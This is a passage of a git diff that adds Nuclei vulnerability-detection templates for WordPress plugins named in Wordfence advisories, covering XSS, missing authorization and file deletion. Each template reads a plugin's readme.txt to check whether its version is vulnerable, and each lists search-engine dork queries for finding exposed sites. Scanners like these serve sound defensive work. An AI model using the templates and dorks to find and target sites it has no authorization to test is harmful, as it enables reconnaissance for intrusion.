+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml b/poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
new file mode 100644
index 0000000000..1776c246f3
--- /dev/null
+++ b/poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
@@ -0,0 +1,59 @@
+id: wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml b/poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml
new file mode 100644
index 0000000000..9c47f3a4fc
--- /dev/null
+++ b/poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml
@@ -0,0 +1,59 @@
+id: forumwp-aaeb37a4320ca1cfa0565e89a95a01bb
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/10b3256b-5271-44b8-ab4d-05156d4f674b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml b/poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml
new file mode 100644
index 0000000000..2df2ea833a
--- /dev/null
+++ b/poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml
@@ -0,0 +1,59 @@
+id: forumwp-b74a371b4e61bc84d659569310ff3232
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting via url Parameter
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd11abe3-8307-492b-beef-242fb21a4206?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml b/poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml
new file mode 100644
index 0000000000..cc1baaa011
--- /dev/null
+++ b/poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml
@@ -0,0 +1,59 @@
+id: smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa
+
+info:
+ name: >
+ Smart Marketing SMS and Newsletters Forms <= 5.0.9 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6125a734-c185-4a97-a4fe-a739aa20de13?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/smart-marketing-for-wp/"
+ google-query: inurl:"/wp-content/plugins/smart-marketing-for-wp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,smart-marketing-for-wp,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-marketing-for-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-marketing-for-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.9')
\ No newline at end of file
diff --git a/poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml b/poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml
new file mode 100644
index 0000000000..b6607a67f0
--- /dev/null
+++ b/poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml
@@ -0,0 +1,59 @@
+id: threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e
+
+info:
+ name: >
+ Broadcast <= 51.01 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/threewp-broadcast/"
+ google-query: inurl:"/wp-content/plugins/threewp-broadcast/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,threewp-broadcast,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/threewp-broadcast/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "threewp-broadcast"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 51.01')
\ No newline at end of file
diff --git a/poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml b/poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml
new file mode 100644
index 0000000000..0e5db922df
--- /dev/null
+++ b/poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml
@@ -0,0 +1,59 @@
+id: video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b
+
+info:
+ name: >
+ Video Player for WPBakery <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee992216-53dd-441e-9c8f-55fbe7567cb7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/video-player-for-wpbakery/"
+ google-query: inurl:"/wp-content/plugins/video-player-for-wpbakery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,video-player-for-wpbakery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/video-player-for-wpbakery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "video-player-for-wpbakery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml b/poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml
new file mode 100644
index 0000000000..c98699c592
--- /dev/null
+++ b/poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml
@@ -0,0 +1,59 @@
+id: wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231
+
+info:
+ name: >
+ WP Find Your Nearest <= 0.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f348e019-d4b5-4384-8ee9-117694259b92?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-find-your-nearest/"
+ google-query: inurl:"/wp-content/plugins/wp-find-your-nearest/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-find-your-nearest,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-find-your-nearest/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-find-your-nearest"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.3.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml b/poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml
new file mode 100644
index 0000000000..ba058803ad
--- /dev/null
+++ b/poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml
@@ -0,0 +1,59 @@
+id: wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889
+
+info:
+ name: >
+ WP Hide & Security Enhancer <= 2.5.1 - Missing Authorization to Unauthenticated Arbitrary File Contents Deletion
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-hide-security-enhancer/"
+ google-query: inurl:"/wp-content/plugins/wp-hide-security-enhancer/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-hide-security-enhancer,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-hide-security-enhancer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml b/poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml
new file mode 100644
index 0000000000..8e57505610
--- /dev/null
+++ b/poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml
@@ -0,0 +1,59 @@
+id: wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9
+
+info:
+ name: >
+ WP MathJax <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0bb89c-6c56-4037-8a55-487244e8d519?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mathjax-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-mathjax-plus/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-mathjax-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mathjax-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mathjax-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml b/poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
new file mode 100644
index 0000000000..1776c246f3
--- /dev/null
+++ b/poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
@@ -0,0 +1,59 @@
+id: wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml b/poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml
new file mode 100644
index 0000000000..2b4a2d1265
--- /dev/null
+++ b/poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml
@@ -0,0 +1,59 @@
+id: wp-mermaid-384c0a7cc618fb29d85738396ef5ac01
+
+info:
+ name: >
+ WP Mermaid <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44a62dd2-539a-4d9a-a32e-f935aa1d0d58?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mermaid/"
+ google-query: inurl:"/wp-content/plugins/wp-mermaid/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-mermaid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mermaid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mermaid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml b/poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml
new file mode 100644
index 0000000000..cd895b277b
--- /dev/null
+++ b/poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml
@@ -0,0 +1,59 @@
+id: wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0
+
+info:
+ name: >
+ WP Private Content Plus <= 3.6.1 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30c46b91-e371-480f-943a-3906d8b6bbba?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-private-content-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-private-content-plus/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-private-content-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-private-content-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-private-content-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml b/poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml
new file mode 100644
index 0000000000..3cbf1ca89b
--- /dev/null
+++ b/poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml
@@ -0,0 +1,59 @@
+id: wp-system-06fc769dd5f956e0682bf74af252b00f
+
+info:
+ name: >
+ WP System <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-system/"
+ google-query: inurl:"/wp-content/plugins/wp-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file